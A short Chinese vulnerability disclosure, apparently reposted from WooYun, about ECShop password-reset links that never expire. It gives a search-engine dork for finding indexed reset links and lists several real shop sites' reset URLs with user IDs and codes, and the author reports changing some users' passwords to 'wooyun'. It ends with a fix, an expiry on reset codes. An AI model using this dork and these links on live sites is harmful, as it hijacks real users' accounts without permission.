ECShop找回密码功能设计缺陷,修改密码链接没有时效性 可通过搜索引擎搜索关键词 来重置ecshop网站上的部分用户的密码 只是不知道用户名无法登陆,只能盲改密码 谷歌 inurl:user.php?act=get_password&uid=
打开一个链接: http://class.enfamily.cn/user.php?act=get_password&uid=277576&code=09d77a40ca80fdfbd33315131e554bb0
随便输入密码 例如:wooyun
已经修改成功,只是不知道用户名无法登陆。 其他搜索引擎 通过bing.com搜索关键词:user.php?act=get_password&uid=
找几个例子
http://www.yofus.com/user.php?act=get_password&uid=666167&code=e32d1180abe40484c2c3743e2393e5b0 密码同样改为wooyun
http://www.ziai168.com/user.php?act=get_password&uid=9086&code=f19cea38ba7af425a8d3eea5a0c4beb4
http://shop.careland.com.cn/user.php?act=get_password&uid=9163183&code=cad8dd2c08a321666e0da6a5bcc56e85
修复方案:对修改密码的code设置一个时效性。 |
-
上一篇: 某系统存在多处Cookie注入 – 网站安全 – 自学php
下一篇: 别克汽车公司某分站拿shell – 网站安全 – 自学ph
评论前必须登录!
立即登录